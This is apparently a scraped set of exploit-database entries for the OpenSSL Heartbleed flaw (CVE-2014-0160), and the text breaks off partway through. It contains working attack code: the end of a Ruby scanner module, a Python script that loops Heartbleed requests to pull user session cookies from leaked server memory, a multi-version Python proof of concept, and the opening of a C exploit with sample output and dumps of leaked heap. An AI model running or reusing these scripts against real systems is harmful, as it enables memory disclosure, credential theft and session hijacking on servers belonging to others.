sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n 
# try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites 
length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << \"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22129"}, {"lastseen": "2018-03-14T02:43:51", "edition": 2, "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import 
OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 
'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n 
\"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: 
[2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' 
+ version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22122"}, {"lastseen": "2018-04-13T03:43:15", "description": "This exploit uses OpenSSL to create an encrypted connection and 
trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and written to a file to annoy IDS/forensics. The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "edition": 2, "published": "2014-04-24T00:00:00", "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and wrote to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. 
Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* 
http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |[email\u00a0protected]|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 
990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |[email\u00a0protected]_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 
|Ltd0..\"0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 
